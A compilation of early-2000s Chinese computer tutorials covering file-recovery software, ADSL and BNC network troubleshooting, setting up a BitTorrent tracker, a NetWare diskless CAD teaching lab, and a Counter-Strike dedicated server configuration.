《一键清理系统垃圾》

返回总目录 目录页 下一页

4.2.5 常用邮件、图片、影像、ZIP、MS Office、声音文件的修复

现在人们越来越多使用电子邮件进行联系，所以电子邮件包含了很多非常重要的个人信息，一旦出现问题，无法打开，损失非常大。因此，掌握一些关于修复故障邮件的办法非常重要。

这里向大家推荐一款非常好的数据修复软件FinalData，具有非常强的修复功能，能修复包括文件分配表FAT、主引导记录MBR、引导扇区、MS Office 文件、影像文件、邮件等对系统和对我们日常工作非常重要的信息。FinalData是一个商业软件，功能最强的是它的企业版，比其它版本对了对于MS Office 文件和邮件的恢复功能。它的下载地址是：http://www.FinalData.com/

因为FinalData是一个具有非常强劲功能的综合软件，因此在本书的很多修复方式都会涉及它，讲述相关的修复方法。

首先，运行FinalData 2.0 企业版，主界面如图7-2-12。从界面上的主菜单中可以看到有“Office File Recovery”和“Email Recovery”两项，说明软件提供了对于Office文件和邮件的恢复功能。下面我们分别从几类常见的文件如何修复进行讲解。

       图7-2-12　FinalData的主界面

1.邮件文件的修复

第一步，单击“Email Recovery”，选择“Start Email Recovery”，选择所修复的邮件所在的驱动器和文件夹，例如“C:\Program Files\Outlook Express\”，如图7-2-13，单击“OK”。开始查找所有被删除的邮件。

        图7-2-13 确定需要修复的邮件文件

第二步，查找结束，出现下一个窗口，把窗口的“END”滑杆拉到最右边，获得恢复的最大值，如图7-2-14，单击“OK”。

        图7-2-14　选择查找范围

第三步，开始扫描之前删除的邮件文件，如图7-2-15。

        图7-2-15　扫描被删除的文件

第四步，确定你要修复的邮件软件，从邮件文件列表中选择要恢复的邮件文件，因为从列表上看不出邮件的具体信息，无法确定是否恢复。因此，选定一个文件，单击鼠标右键，选择“Recover Message”，以便查看邮件内容。

第五步，邮件文件的列表显示出来，如图7-2-16。选择一个邮件，单击“view message”，以便查看邮件内容。用同样的方法一个一个地查看文件。

        图7-2-16 显示被删除的文件列表

第六步，提过查看邮件的内容，确定需要恢复的邮件，然后单击“Recover”按钮，在随后出现的窗口中选择保存邮件的文件夹，但不要在删除以前所保存的位置，开始恢复。

第七步，进入Outlook Express，打开刚才所保存的文件，在再次查看邮件信息是否正确，如果确实无误，单击菜单“打开”中的“移动到文件夹”，接着选择“收信箱”，单击“确定”，将刚才的邮件恢复到原来的收件箱。

这样，一个邮件文件就被恢复了。

2. MS Office 文件的修复

第一步，在FinalData的主界面，单击图标栏的第一个图标或者在菜单“file”中选择“open”，在随后出现的窗口中选择目标驱动器。

第二步，开始扫描磁盘相关数据，将选择范围调至最大，如同上例，如图7-2-17。

   图7-2-17　扫描范围调至最大

第三步，开始查找已经被删除的文件和文件夹。然后显示查找结果，如图7-2-18。

   图7-2-18　显示查找结果

第四步，选择要修复的文件，然后根据这个文件的类型从菜单项“Office File Recovery”中选择对应的恢复项目，例如Word文件对应菜单选项是“Microsoft Word File Recovery”，其他的菜单选项还有Powerpoint和Excel。

随后出现的窗口显示该文件的基本数据，单击“下一步”，出现文件损坏程度检查窗口，单击“check rate”检查文件损坏程度，显示在右边的小窗口，窗口下部是对于损坏等级的说明，如图7-2-19，单击“下一步”。

    图7-2-19　显示文件被破坏的等级

第五步，出现保存窗口，选择文件夹保存这个文件，勾选“Recover All Format”，单击“Start Recovery”，如图7-2-20，开始恢复文件。

    图7-2-20 保存修复的文件

第六步，检查一下恢复以后的文件，是否信息完全正确。

3.影像文件的修复

常用的影像文件格式有DivX、AVI、ASF、WMV、WMA、RM等，而这些文件的恢复需要专门针对图像文件的修复软件Video Fixer，但是MPEG格式的文件无法用Video Fixer修复，可以用前面介绍的FinalData修复。

运行Video Fixer，单击窗口左侧的第一个按钮“Add”添加要修复的影像文件，然后单击“fix”修复，窗口下方会显示修复信息和进度，如图7-2-21，最后如果修复成功就保存起来。

   图7-2-21　显示修复影像文件的进度

4.修复MPEG1和MPEG2文件

修复修复MPEG1和MPEG2文件仍然用FinalData，而且在选择需要修复的文件驱动器和扫描、查找方式都和修复Office文件类似，只是在选定要修复的文件以后，针对文件类型选择修复方式时，要单击 “Tools” 下的菜单项“Recover a file Partially Damaged”的子菜单“Recover MPEG File”，如图7-2-22。其余过程和修复Office文件一样。

图7-2-22 选择修复的文件类型

5. 修复ZIP文件

为了节省空间，常用压缩文件的形式保存文件。而压缩文件如果出现故障，无法打开，就会造成数据损失。压缩软件本身没有提供修复功能，因此必须借助第三方软件。在这里我们推荐ZIPRepair。它修复压缩包的方式很简单，将原来无法打开的文件包中可以正常使用的数据单独拿出来另外存为一个文件，而且使用简单至极，只要单击界面窗口的“Repair Zip File”按钮，然后选择要修复的ZIP压缩包，随即开始修复，如图7-2-23。

   图7-2-23 修复ZIP文件

6. 常见图片文件的修复

大多数人的机器中都存储有很多精美的图片，可能是自己到处精心搜集的，或者是用数码相机拍摄，让美好的赏心悦目的瞬间感觉成为永恒。但是图片文件和其他类型的文件一样，一个误删除，或者数码相机的内存卡出现一些问题，都会让这些美丽的图片瞬间消失。所以你也需要有一个针对这些图片文件的修复工具，有备无患。

这里向大家推荐的是Photo Recovery，以前是一个免费软件，叫做Digita Image Recovery，现在开始收费了。这可是一个功能非常强劲的修复工具，能够修复很多类型的内存卡，包括Flash Card、SmartMedia、SONY Memory Stick、IBM Micro Drive、Multimedia Card、Secure Digital Card 以及 Compact disc，而它能修复的图片文件类型包括：

图片，有JPEG、exif、TIFF、PNG、GIF、BMP、Canon CRW；

音乐影像文件，AVI、MOV、WAV。

Photo Recovery修复图片文件的唯一前提是需要把数码相机的内存卡作为一个独立的驱动器。

Photo Recovery使用非常简单，运行它并找到数码相机内存卡所在的盘符，确定要修复的文件，单击“START”，然后就是耐心等待修复结果了。

下载地址：http://www.le-tech.com/

Photo Recovery也有一个令人遗憾的地方，无法修复因为数据写入时数码相机断电所导致的数据丢失。因此我们另外推荐一个软件ImageRecall Lite Edition。这个软件专门修复内存卡因为读取错误而无法读取文件的情况，针对数码相机内存卡特有的问题进行修复。

下载地址http://www.imagerecall.com/


ADSL常见经典故障大全！

《一键清理系统垃圾》

ADSL常见经典故障大全！

ADSL是运行在原有电话线上的一种高速宽带上网方式，它具有节省投资、上网速度快、安装简单等优点。目前很多局域网尤其是网吧都使用这种方式。当然用这种方式上网的故障也比较多，下面就为大家谈谈ADSL故障的排解方法与实例。
    造成ADSL故障的因素

    ADSL常见的硬件故障大多数是接头松动、网线断、集线器损坏和计算机系统故障等方面的问题。一般都可以通过观察指示灯来帮助定位。
    此外，电压不正常、温度过高、雷击等也容易造成故障。电压不稳定的地方最好为Modem配小功率UPS，Modem应保持干燥通风、避免水淋、保持清洁。遇雷雨天气时，务必将Modem电源和所有连线拔下。Modem损坏如果指示灯不亮，或只有一个灯亮，或更换网线、网卡之后10Base-T灯仍不亮，则表明Modem已损坏。
    线路距离过长、线路质量差、连线不合理，也是造成ADSL不能正常使用的原因。其表现是经常丢失同步、同步困难或一贯性速度很慢。解决的方法是：将需要并接的设备如电话分机、传真、普通Modem等放到分线器的PHONE口以后：检查所有接头接触是否良好，对质量不好的户线应改造或更换。

    定位ADSL故障的基本方法

    ADSL的故障定位需要一定的经验，一般原则是：留心指示灯和报错信息，先硬件后软件，先内部后外部，先本地后外网，先试主机后查客户，充分检查后再申报。故障的申报应该准确简洁，应尽量将遇到的问题与用户手册上提到的故障相对应。向机房报故障时，应根据用户手册首先报出端口编号和用户名。对经常性的故障，用户应进行记录，并在申报时提及。
    1.检查电源指示灯是否正常
    电源指示灯位于用户Modem 3个指示灯的最左边，持续点亮为正常，如电源指示灯不亮，用户可自行解决电源问题。
    2.数据指示灯是否正常
    数据指示灯位于用户Modem 3个指示灯靠右边的两个，持续点亮为正常，说明用户端至DSLAM局端线路无故障：如该指示灯不亮，说明线路有问题，需由电信部门现场解决。
    3.用户是否自行改动IP地址
    每个用户PC均有其固定IP地址，如用户改动其地址，则电信部门可提供其PC的IP地址，把IP地址重新改回来即可。
    4.用户网卡、网线是否正常
    用户PC网卡经网线连接Modem后，其指示灯会闪亮，如该指示灯不能正常闪亮，说明用户网卡或网线有故障。
    如果以上各项均正常，用户仍不能上网，则需由ISP的技术人员现场解决。
--------------------------------------------------------------------------------
作者: 恐龙の蛋　　时间: 2003-12-19 12:26　　 标题: [注意][分享]ADSL常见经典故障大全！

故障诊断处理实例

    1.局域网上的计算机无法使用PPPoE
    [故障现象]
    一台ADSL连接所使用的是10/100Mb/s的HUB，而在局域网上的计算机却无法使用PPPoE。
    [故障分析处理]
    ADSL使用的是10Base-T标准即10Mb/s，它连接10/100Mb/s的HUB是不会有问题的，但是如果计算机和HUB的连接速度是100Mb/s，HUB的10/100Mb/s交换模块目前对PPPoE支持并不是很好，那么PPPoE就有可能无法在100Mb/s网速下找到ADSL信号，就不能使用了。解决办法就是用于PPPoE拨号的计算机使用10Mb/s的接线方法制作10Mb/s网线，或者将网卡强行设置工作在10Mb/s速度。
    2.数据流量大时出现死机
< [故障现象]
    一台ADSL，当数据流量增大时就会死机。
    [故障分析处理]
    一般情况下，这是因为网卡的品质或者兼容性不好所引起，特别是老式ISA总线IOM网卡，由于PPPoE是比较新的一项技术，这类网卡兼容性可能会有问题，并且速度较慢，造成冲突，最终线路锁死，甚至死机。
    3.安装PPPoE后启动速度变慢
    [故障现象]
    安装了ADSL的PPPoE软件以后电脑启动速度慢了。
    [故障分析处理]
    这和网卡设置有问题有关，由于系统启动时需要一个合法的IP，局域网中需要正确设置DHCP服务器，如果是单机使用就给网卡指定一个IP，便可以解决问题，例如：192.168.xxx.xxx，子网掩码：255.255.255.0。
--------------------------------------------------------------------------------
作者: 恐龙の蛋　　时间: 2003-12-19 12:26　　 标题: [注意][分享]ADSL常见经典故障大全！

4.不能列出ISP的服务项目
    [故障现象]
    PPPoE软件安装和工作都正常，但不能列出ISP的服务项目。
    [故障分析处理]
    首先检查硬件的连接是否正确，ISP是否在提供服务，这些可以通过观察ADSL Modem同步工作灯显示状态来判断，如果同步工作灯显示正常工作，那就检查计算机内其他设备是否干扰了ADSL的工作，并且将驱动程序升级。还需要注意的一点就是ISP是否开通了相应的服务，由于ADSL还有一些特殊编号捆绑在电话交换机中，ISP需要认证了这些编号后才能视为用户的线路合法可用；还有ISP的ADSL接入服务器没开，也不可能列出服务器项目。
    5.ADSL上网速度慢
    [故障现象]
    有时候ADSL访问速度并不比普通拨号Modem快多少。
    [故障分析处理]
    造成ADSL访问速度慢的原因主要有：
    1)如果访问国外站点，访问会受到出口带宽及对方站点配置情况等因素的影响。
    2)ADSL技术对电话线路的质量要求较高，且目前采用的ADSL是一种RADSL (速率自适应ADSL)，如果电话局所在楼到用户间的电话线路在某段时间受到外在因素的干扰，RADSL会根据线路质量的优劣和传输距离的远近动态地调整用户的访问速度。
    6.有时不能联网
    [故障现象]
    ADSL有时不能正常上网。
    [故障分析处理]
    ADSL是一种基于双绞线传输的技术，双绞线是将两条绝缘的铜线以一定的规律互相缠在一起，这样可以有效抵御外界的电磁场干扰。大多电话线是平行线，从电话公司接线盒到用户电话这段线大多用的是平行线，这对ADSL传输非常不利，过长的非双绞线传输会造成连接不稳定、ADSL灯闪烁等现象，从而影响上网。由于ADSL是在普通电话线的低频语音上叠加高频数字信号，所以从电话公司到ADSL滤波器这段连接中任何设备的加入都将危害到数据的正常传输，因此在滤波器之前不要并接电话、电话防盗器等设备。
--------------------------------------------------------------------------------
作者: 恐龙の蛋　　时间: 2003-12-19 12:26　　 标题: [注意][分享]ADSL常见经典故障大全！

  7.ADSL的指示灯都正常但仍然掉网
    [故障现象]
    一台ADSL的指示灯为绿色，但也发生掉线现象，且重新启动Modem后就好了。
    [故障分析处理]
    这种情况多发生在没有代理服务器，没有做防火墙或没有路由器的网络用户上。这是因为在ADSLModem上有个“lOBase-T”口，这个口是接局域网的HUB口。虽然是10Mb/s的端口，但是ADSL的上行带宽只有几百kb/s。如果用户局域网内部是ADSL直接接HUB，HUB再接下面的客户机，网络内的许多与ADSL无关的数据包将占用ADSL上行通道，ADSL也无法控制局域网内的广播风暴；如果超过ADSL上行传输能力，数据包将装入ADSL的缓存；如果数据量继续增大，缓存溢出，则造成ADSL“休眠”现象。这样只有重新启动Modem了。解决办法是做一台双网卡的代理服务器，这样可以隔断Modem与局域网之间的直接通信，避免上述问题。
    8.虚拟拨号失败
    [故障现象]
    ADSL在使用虚拟拨号软件时提示错误信息，拨号失败。
    [故障分析处理]
    如果拨号窗口显示“Begin Negotiation”然后等待，最后直接弹出菜单“time out”，这种情况表明网络不通。主要原因是ADSL上的10Base-T端口上的网线没有连接好或ADSL网络不通，可以重启ADSL后再试。
    如果拨号窗口显示“Begin Negotiation”，然后显示“Authenticating”，最后显示“Authentication Failed”，这种情况表明用户账号或密码有误。
    如果拨号窗口显示“Begin Negotiation”，然后显示“Authenticating”，然后再显示“Receiving Network Parameter”，最后弹出菜单“timeout”，这种情况表明拨号IP地址已经被占满，需稍后再拨。


BNC网络维修思路

《一键清理系统垃圾》

BNC网络维修思路

BNC网络传输距离比双绞线传输距离长很多，布线简单。BNC网络的一个接点是由一个T型连接器组成，两边各连接同轴电缆，如果该接点是最后的一个点，那么要连接上一个50终极电阻。

由于BNC网络都是串联的，当一个接点出问题后，整个网络就会出问题。检查就比较麻烦，并且没有一个好的维修思路，就很难查出问题所在。

笔者最近就碰到一个BNC网络故障，在2幢大楼之间需要联网，考虑到距离的问题，所以使用了同轴电缆。发生的故障是2边都无法连接，PING不通。我们在碰到这类问题的时候，首先会考虑到网线或则电脑软件的设置是否正确。

在检查的时候，可以先观察网卡上的指示灯，正常的情况下红色灯两起，绿色灯闪动。当出现问题的时候，绿色灯就会不亮，并且红色灯可能会出现异常闪动。在这种情况下，我们先用万用表测量网络，把万用表调到欧姆档，将两端50欧姆电阻拿下，然后测量，应该是万用表没有任何反映。当出现反映，BNC头可能没有做好，或者线路出现问题。

如果网卡指示灯正常，两边无法PING通，可能就是IP地址设置问题，网关设置设置不正确造成。

检查BNC头可以和检查线路同时进行，同轴电缆是有2层组成，把外层保护橡胶剥去后，可以看见金属层屏蔽网线，屏蔽网线下有一个被白色保护层包着的是芯线。屏蔽网线和内层芯线碰在一起会造成网络无法连接的情况。我们在检查的时候，可以在离BNC头大约20厘米的地方将网线剪断，将两段的电阻装上。把金属层屏蔽网线和芯线用万用表测量，正常情况下应该是50欧姆，如果不是，可以从新做一个BNC头，再替换电阻进行测量，问题造就，那么就说明测量的那段电缆出现故障，然后用剪线的方法检查那段，最终发现问题所在。在用剪线的方法检查网络的时候，每次查完，都要用包布将芯线和金属层屏蔽网线包起来。注意，不要发生短路。

BNC网络最容易发生的问题是BNC头出现故障，这都是在制作中发生的问题，可以在制作的时候小心。另一个问题是线断掉，或则被老鼠咬。

以上是BNC网络维修的一般思路，希望能够对大家解决BNC网络故障起一点作用。


BT服务器架设全攻略

《一键清理系统垃圾》

BT服务器架设全攻略

BitTorrent服务器资料

    首先让我们了解BitTorrent服务器需要什么样的配置。

    1.你需要一个配置比较高的服务器：

    标准配置：P3 1GHZ 1G内存 硬盘没有限制但是最少7200转

    PS:服务器的配置根据你网站的访问量不同而定，如果你网站已经有日5万以上的访问量最好使用P41.7G以上的服务器，这样才能保证BitTorrent服务器的稳定。

    2.你需要一个稳定的ADSL带宽！

    以512K的ADSL为例。512KADSL的下行（指下载）速度一般是230K左右（根据城市不同而定），上行（指上传）速度一般为60K。也就是说，如果你要用512K的线路作BitTorrent服务器的话别人上传到你服务器的种子文件（一般大小在40KB）速度是没有问题的。但是访问量超过5万速度就有点慢了，因为访问者都要从你的服务器上下载种子文件，而你的上行速度就是别人的下行速度，也就是说别人在你的服务器上下种子，只有<60KB的速度。

    PS:服务器的带宽越高，流量访问也就越稳定。

    3.你需要一个能发布WEB页的服务器！

    一般情况下，现在大多用户使用的操作系统是WIN2000以上版本（由于98系统的网络支持较差，这里我们不在叙述98下的BitTorrent服务器架设），而WIN2000以上系统基本上都带有IIS。IIS是发布WEB页的重要组件，如果你想使用apache来架设WEB页也是可以的，不过这个还要取决于你的BitTorrent发布页是用什么脚本编写的，因为apache不能支持ASP。现在已经编写出来的BitTorrent发布页脚本有PHP（原官方程序改编的http://www.btchina.net/）CGI（雷傲编写http://www.leoboard.com/）ASP（比特互联编写）现在大部分使用的是PHP的，少部分使用CGI的，因ASP有版权所以目前只有中国比特互联（http://www.chinabt.cn)/在使用ASP编写的BitTorrent发布页脚本。按照稳定程度而言，其实大部分取决于TRACK的编写（后面我会讲解的），但是也有一部分原因在发布页的语言编写。

    PS：按照速度而言PHP最快，下来是ASP，最后是CGI。
    二.BitTorrent服务器架设

    首先看看我们的服务器上要装什么软件来实现BitTorrent发布页的发布

    1.保证你的服务器可以发布WEB页（具体操作在这里就不作讲解了）。

    2.BitTorrent原程序是Python编写的，所以服务器需要安装Python-2.3b2来完成解析任务。

    3.与此同时我们还需要安装activeperl来支持以上两个程序。

    4.如果你的WEB页发布是用apache来实现的，你还需要安装apache_1.3.27-win32-x86-no_src。

    5.最后你还需要BitTorrent核心程序BitTorrent-3.1。

    其次让我们来看看具体操作过程

    1.首先下载Python-2.3b2.exe

    下载地址

    http://www.python.org/ftp/python/2.3/Python-2.3b2.exe

    安装到e：（不一定局限安装路径，但是最好将所有BitTorrent相关发布页及支持程序放在一个盘符，这里我们以E:来进行讲解）

    2.下载BitTorrent-3.1.zip

    下载地址http://bitconjurer.org/BitTorrent/BitTorrent-3.1.zip

    解压到 e:/bittorrent 目录下！

    3.下载trackerlyze.exe

    下载地址：http://www.chinabt.cn/bbs

    存放到e:/bittorrent 目录下！

    PS:切记trackerlyze.exe 一定要放在 bittorrent 目录下。

    4.打开 dos 窗口。

    在 bittorrent 目录下，使用如下命令bttrack.py --port 6969 --dfile dstate

    PS:这个过程是检测Python23是否成功支持bittorrent程序

    5.现在用这个命令！

    E:\Python23\Python bttrack.py --port 6969 --dfile dstate | trackerlyze.exe

    PS：如果不出现任何错误，或者DOS窗口自动关闭，那么以上安装步骤是成功的！

    6.在 bittorrent 目录下建立 status 目录
    PS：此目录是为以后TRACK扫描种子信息所作的。此目录至关重要！

    7.下载activeperl.msi

    下载地址：http://www.cgier.com/software/activeperl.msi

    安装到：E:\usr 默认安装目录本来是 c:\perl 请务必改成 E:\usr

    PS：此文件是支持PHP文件的，因发布页文件中有.pl文件，所以我们需要此程序来支持。
    8.从比特互联索取bittorrent发布页文件（文件是CGI的）

    安装到E:\BT（目录可以自行设置）

    9.将IIS的默认目录到E:\BT,然后设置IIS支持CGI,并且添加index.cgi为默认主页文件.

    10.全部设置玩后在IE里输入127.0.0.1,看看是否能访问.如果不能访问,请确认你的IIS是否支持CGI.

    11.制作服务器的TRACK.

    TRACK是bittorrent服务器最关键的一部分,如果TRACK关闭了,你发布页上的所有种子都将失效.

    首先,在BitTorrent目录下建立一个批处理文件TRACK.bat。具体步骤：新建文本文档在里面输入E:\Python23\Python bttrack.py --port 6969 --dfile dstate | trackerlyze.exe然后另存为track.bat，把保存类型设置为所有文件。这样你就制作完成TRACK了.

    之后运行TRACK看看是否出错，如果DOS窗口只显示E:\Python23\Python bttrack.py --port6969 --dfile dstate | trackerlyze.exe那么就表明你的TRACK是好的！

    12.最后检查你从中国比特互联得到的bittorrent发布页文件中各个文件里的路径，一定要和你安装其他支持程序以及新建立的目录路径一致，这样才能保证bittorrent发布页程序正常
的运行。

    总结：

    bittorrent之所以在中国传播的这么快，就是因为它的共享形式独特。但是如果你想成功安全的架设一个完美的BT发布页程序，还需要一些ASP、CGI、PHP相关的编程知识，这样你才能更好的维护好你的bittorrent服务器。


CAD教学网组建实例

《一键清理系统垃圾》

CAD教学网组建实例

    一、网络的规划设计
    经过从投入资金、使用需求、管理维护等多方面综合考虑，我们决定：CAD教学网使用1台服务器和30台无盘工作站、Netware 4.10 网络操作系统、星型拓扑结构。为提高网络运行速度，用内部网桥分成两个局域网，即在服务器里加两块网卡，每块网卡接一个16口的集线器，负担15台工作站。网络结构如图所示：
    服务器和工作站的配置如下：
    服务器：Pentium MMX200 CPU、ASUS TX97－XE主板、64M SDRAM、2只4.3G QUANTUM 火球硬盘、2个D_Link PCI网卡、14″彩显
    无盘工作站：Pentium MMX166、ASUS SP97_V主板(集成SIS显示卡）、16M EDORAM 、1.44M软驱、Anet 2000 ISA 网卡、14″彩显
    二 、 网络的安装
    1. 服务器的安装
    先创建DOS分区并装入DOS的系统引导文件。该分区主要用来存放网络的启动文件，100M就足够。再进入Netware4.1光盘的install\english目录执行install即开始进行安装。
    2. 无盘工作站的安装
    工作站无盘启动的原理是利用网卡上的BootROM芯片截取计算机对A驱的读申请，从网上的sys:login目录打开net$dos.sys文件，在内存中虚拟一个A盘，然后用这盘引导启动计算机。无盘启动的条件是：服务器上网卡使用的帧类型应有Ethernet802.3，否则BootROM将找不到服务器；工作站上网卡的使用模式应为Jumpless;sys:login目录下应有自举映象文件net$dos.sys。还应注意网卡默认的内存地址C800是否与其它设备冲突，如在SP97_V主板上就应把内存地址设置为D800。
    工作站的启动方式有IPX和ODI方式两种。对Netware4.1应采用ODI方式。
    进入sys:public\client\doswin目录，执行install就可把ODI方式的启动文件装到A盘（A盘应是可引导的）。因为要实现无盘启动，还应把sys:public\client\doswin\rpl目录下的rplodi.com文件复制到A盘，并在A盘的startnet.bat的lsl.com行后插入rplodi.com命令，在autoexec.bat文件末尾加上startnet.bat行（不能用Call startnet.bat）。进入sys:system目录，运行dosgen自动把A盘内容做成映像文件net$dos.sys，把该文件和A盘中autoexec.bat和startnet.bat文件复制到sys:login目录。
    经过上述步骤，就可实现无盘启动工作站了。
    三、 网络应用程序的安装
    应用程序在网络上可分为共享与不共享两类。我们把可共享的应用程序安装在一共用的目录下，如sys:APPL，把不可共享的应用程序则按需要安装在用户自己的目录下。把map root g:=sys:APPL和map root h:=user:user\%login_name放在用户的登录文本（login script）中映射为G盘和H盘。G盘存放可共享的应用程序，而H盘存放不可共享的应用程序。从G盘和H盘的映射可知，不同用户的G盘是一样的，而H盘是不同的，但对各用户来讲，使用环境完全一样。
    有些应用程序指定安装在本地盘上，如C盘(或D盘)，这时可用map 命令映射出C盘（或D盘）再安装，在使用前也应映射出C盘（或D盘）。
    Windows的应用程序要在Windows环境下安装。在网络上安装中文Windows3.2的方法，一般是用setup/a命令把Windows全盘安装到服务器上，安装目录可自定，如winuser；再在用户环境下用setup/n选择定制安装到用户的Windows目录中，如win32，用户的网络搜索路径应包含有winuser目录。由于Windows3.2的网络驱动与Netware4.1不兼容，这样安装的Windows可能不能使用。解决办法有：1在定制安装时，Netware项选择Not installed。但这样Windows的网络功能，如网络打印等将不能使用。2定制安装后，在用户的win32目录下创建system目录，转到sys:public \client\doswin目录执行install，进行ODI方式启动文件的安装过程，在是否支持Windows选择中选择yes，Windows目录定为用户的win32目录，完成后把用户win32\system目录下的文件复制到winuser目录（要覆盖同名文件）。这样，以后经setup/n安装的Windows3.2就能正常使用了。
    由于用户H盘的使用环境是完全一样的，用某一用户环境安装的应用程序，把该用户H盘的内容复制到另一用户的H盘后，另一用户马上就可使用这些应用程序。这给网络管理带来很大方便；一旦某一用户的应用程序被破坏了，只需从另一用户中复制过来就可使用，而不需重新安装。
    应注意若要使用Windows3.2，无盘启动时不应在config.sys文件中安装emm386.exe。
    四、 用户权限的设定
    为防止某些用户对网络文件的恶意破坏，在能正常使用的情况下，用户权限应尽可能地少。用户对所有要使用的应用程序目录均应有基本的Read和 Scan权限。Modify权限一般不赋予用户。其它权限应根据实际情况确定。有的应用程序用户只需有Read和 Scan权限就可以使用了；有的应用程序因为在某一目录下要创建临时文件，或修改某些文件，那用户对该目录就应有Create、Erase、Write的权限。确定用户权限的步骤如下：
    1． 赋予用户应用程序目录所有权限，并运行一次应用程序。
    2． 进入应用程序目录，用r命令看是否有删除过的临时文件。若没有，则用户对该目录只需要基本权限就够了；反之则说明还应有Create、Erase和Write权限。
    3． 进入应用程序目录，作dir /od命令观察有哪些文件被改过。若有则用户对这些文件应有Write的权限，除了这些文件，其它文件可用Flag命令加上Read Only属性。
    4． 重新设定用户权限后运行应用程序，若不能正常使用，则说明权限不够，这时只能通过逐步开放权限进行尝试了。
    应注意，对用户拥有Erase权限的目录，其中的文件应尽量设为Read Only。由于用户要有Write权限的文件不能设为Read Only，应做一备份，以便文件被破坏时可以恢复。
    五、 关键环节设计
    1.卷的设计
    我们的服务器有两个硬盘，我们在一个硬盘建sys卷，另一个硬盘建user卷，sys卷放系统文件和应用程序，user卷放用户目录。sys卷上建的目录有:APPL目录、start目录（启动网络的目录，把启动的文件都放在目录里面。并在登录文本映射本目录，如map s1:=sys:start）等。user卷建dosuser目录、winuser目录、teacher目录（教师）、save目录（公用存文件目录），dosuser目录下建用户的子目录，如D01、D02、D03....D30等，winuser目录下建用户子目录，如W01、W02、W03....W30等。
    2.组的设计
     根据DOS环境和Windows环境，建两大组，一组是dosgroup，另一组是wingroup，再建各用户，如Dos、D01、D02、D03...D30（都属于dosgroup组），Win、W01、W02、W03...W30（都属于wingroup组）。
    3. 登录文本的设计
    D01的登录文本:
    Map F:=sys:login
    Map root G:=sys:appl
    Map root H:=user:dosuser\%login_name
    Map root I:=user:save
    Map s1:=sys:start
    Map s2:=sys:login
    Map s3:=sys:public
    Map s4:=sys:dos
    Map s5:=sys:appl\ucdos
    Map s6:=sys:appl\cced
    Exit "dos.bat"
    W01的的登录文本:
    Map F:=sys:login
    Map root G:=sys:appl
    Map root H:=user:winuser\%login_name
    Map root I:=user:save
    Map s1:=sys:start
    Map s2:=sys:login
    Map s3:=sys:public
    Map s4:=sys:appl\winser
    Exit "win.bat"
    4. 自动登录和自动退出的设计
    在autoexec.bat和config.sys中设计成多重菜单:
     ①DOS
     ②Windows
    做出选择后就进入网络，然后相应执行Login dos （或Login win），根据DOS用户的登录文本（或Windows用户的登录文本），相应进入各台工作站，登录到DOS环境和Windows环境，完成全自动登录过程。要实现退出系统时自动退出网络，就要在DOS用户的登录文本（或Windows用户的登录文本）的末尾加入 Exit ″logout″ 这一句。这样做有两个好处：1当退出系统后自动退出网络，免得管理员一台一台地退出；2在使用过程中，就算不小心退出了网络，只要执行 Login dos (或Login win)就可以进入网络了。
    该CAD教学网建成后，其速度快，操作简单，使用方便，网络的维护简单高效，使用效果令人满意。

返回


服务器端的设置：

《一键清理系统垃圾》

服务器端的设置：

    第一种方法需要安装HLserver4108下载地址http://download.cq.cngb.com/download2k2.php?dn=ftp://203.93.111.138/pub/game/cs/hlserver4108.exe&cxtj=1418。然后再升级到最新版，再安装CS1.5最新版，最后设置一下基本参数就行了。

    第二种方法很简单，就是直接使用CS1.5提供的hlds.exe，这是最方便的办法，然后将以上hlds.exe建立一个快捷方式，在命令行里输入下面一行（注意空格）：

    D\Hlserver\hlds.exe -game cstrike -port 27015 +maxplayers 28 +map　de_dust2 -nomaster +sv_lan 1
    D\Hlserver\hlds.exe 你安装hlserver的目录
    -game cstrike 指定运行游戏为CS
    -port 27015　指定游戏连接端口为27015
    +maxplayers 22　游戏最大人数28人
    +map de_dust2　指定开始地图为de_dust2
    -nomaster 服务器不上WON认证
    +sv_lan 1 指定其为一个LAN Server

CS全称Counter Strike，中文名反恐群英，是目前世界上最红火的在线FPS游戏。根据统计，仅仅在一周之内计算得出的CS玩家就超过200万名。伴随着CS1.0的发售，CS也在国内越来越红火，但是在线FPS游戏对网络的线路要求比较高，如果对手使用宽带而你只是使用MODEM的话，不怕你是多厉害的高手也很难取胜。同时还有很多家里没有电脑的朋友，难道这些朋友就要丧失CS的乐趣了么？这里有一个解决方法，就是到网吧去玩游戏。网吧游戏通常有两种建立服务器的方法：

一、直接进入游戏，进入LAN GAME并Create一个游戏，其他人从LAN GAME里自动搜索出服务器进入。但是这种方法有一个致命的问题，就是作为服务器的那台机器会有非常大的负担，在PⅢ550的机器上有10个玩家连接进入以后，服务器的玩家就可以明显感到画面延迟现象出现。所以不推荐使用这种方法建立服务器。

二、利用游戏本身带的专用服务器程序建立服务器。这种方法通常需要一台单独的机器运行服务器程序，以20个玩家来说，一起多分摊一个机器的上机费用应该说负担很小，更何况很多网吧有自己单独的服务器来运行各种游戏的服务器程序满足玩家的需求。因此这种方式是最合适的方式。

下面我就为大家介绍一下建立专用CS服务器的方法：

首先的我们需要做的是安装《半死不活》(Half Life，以下简称HL)和CS，需要注意的是服务器和客户端都要保持HL和CS的版本一致，否则是无法进行连接的。程序可以直接从其他机器复制而来。不管是HL还是CS，都带有一个名为hlds.exe的程序，这就是专门用来架设服务器的程序。直接双击它以后运行的是HL，所以我们必须对它进行一些相应的配置。CS的配置文件有以下三个：Server.cfg、Mapcycle.txt、Motd.txt，文件都在Cstrike目录下。这三个文件都是文本文件，可以使用任何文本编辑器进行编辑。Server.cfg是服务器的基本配置文件，主要的设置都在这里进行，下面是一些常用的设置，并附带解释：

1.Server.cfg

可用任何文本编辑器进行编辑。

0为No，1为Yes。

sv_aim0 是否自动瞄准

pausable0 是否客户端可暂停游戏

hostname “CSchina.yeah.net CS'Server ”　服务器名字

mp_timelimit 30 更换地图时间

mp_c4timer 45 炸弹倒计时时间

mp_chasecam 0 是否固定镜头(如果选1，进入服务器后只能在固定地点观战，否则未加入队伍的人可以自由观看)

mp_forcechasecam 1 死后是否可以自由观看，参数选1为只可以查看自己人，2为死后只能固定在死亡地点

mp_falldamage 1 高处落下具有伤害

mp_flashlight 1 是否有战术手电

mp_footsteps1 是否有脚步声

mp_freezetime 4 每局开始固定买物品时间

mp_friendly_grenade_damage1是否手雷友军伤害

mp_friendlyfire 1 是否友军伤害

mp_autoteambalance2 自动调整双方人数差异最低限制，当一方人数超过另一方2人时会将多出的人分配到少人的队伍

mp_roundtime4 每回合时间

rcon_password  服务器密码

mp_tkpunish 0 是否对伤害友军的人进行惩罚(踢出服务器)

